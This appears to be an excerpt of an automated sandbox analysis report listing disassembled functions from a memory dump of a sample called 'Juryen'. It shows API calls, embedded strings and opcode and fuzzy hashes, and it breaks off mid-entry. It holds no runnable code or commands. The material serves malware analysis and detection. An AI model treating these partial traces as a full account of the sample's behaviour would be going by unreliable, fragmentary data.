                                                                    Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy
                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                    • API String ID: 1284135714-318151290
                                                                    • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                    • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                    Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                    • String ID: 0$6
                                                                    • API String ID: 4066108131-3849865405
                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                    Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004082EF
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                    • memset.MSVCRT ref: 00408362
                                                                    • memset.MSVCRT ref: 00408377
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 290601579-0
                                                                    • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                    • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                    Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                    • memset.MSVCRT ref: 0044505E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memchrmemset
                                                                    • String ID: PD$PD
                                                                    • API String ID: 1581201632-2312785699
                                                                    • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                    • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                    Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                    • String ID:
                                                                    • API String ID: 2163313125-0
                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                    Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$wcslen
                                                                    • String ID:
                                                                    • API String ID: 3592753638-3916222277
                                                                    • Opcode ID: 16b54fee0f637cae59fa932ab571a494c8bcd9845b7d0efff702067cfa1db6c1
                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                    • Opcode Fuzzy Hash: 16b54fee0f637cae59fa932ab571a494c8bcd9845b7d0efff702067cfa1db6c1
                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                    Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A47B
                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                    • String ID: %s (%s)$YV@
                                                                    • API String ID: 3979103747-598926743
                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                    Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                    • String ID: Unknown Error$netmsg.dll
                                                                    • API String ID: 2767993716-572158859
                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                    Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                    • API String ID: 3176057301-2039793938
                                                                    • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                    • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                    Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                    • database is already attached, xrefs: 0042F721
                                                                    • out of memory, xrefs: 0042F865
                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                    • API String ID: 1297977491-2001300268
                                                                    • Opcode ID: d90276cd3b33e84704fa81d672eb3a60ddd37f71ba5f2179a76d6bf5f10cf06e
                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                    • Opcode Fuzzy Hash: d90276cd3b33e84704fa81d672eb3a60ddd37f71ba5f2179a76d6bf5f10cf06e
                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                    Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                    • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                    • String ID: ($d
                                                                    • API String ID: 1140211610-1915259565
                                                                    • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                    • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                    Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                    • String ID:
                                                                    • API String ID: 3015003838-0
                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                    Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00407E44
                                                                    • memset.MSVCRT ref: 00407E5B
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                    • String ID:
                                                                    • API String ID: 59245283-0
                                                                    • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                    • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                    Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                    • free.MSVCRT ref: 004185AC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                    • String ID:
                                                                    • API String ID: 2802642348-0
                                                                    • Opcode ID: 09b49c58799734cfd5cd4ac30739c3777d201f49183e4126d4f53e2d18a03a45
                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                    • Opcode Fuzzy Hash: 09b49c58799734cfd5cd4ac30739c3777d201f49183e4126d4f53e2d18a03a45
                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                    Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                    • API String ID: 3510742995-3273207271
                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
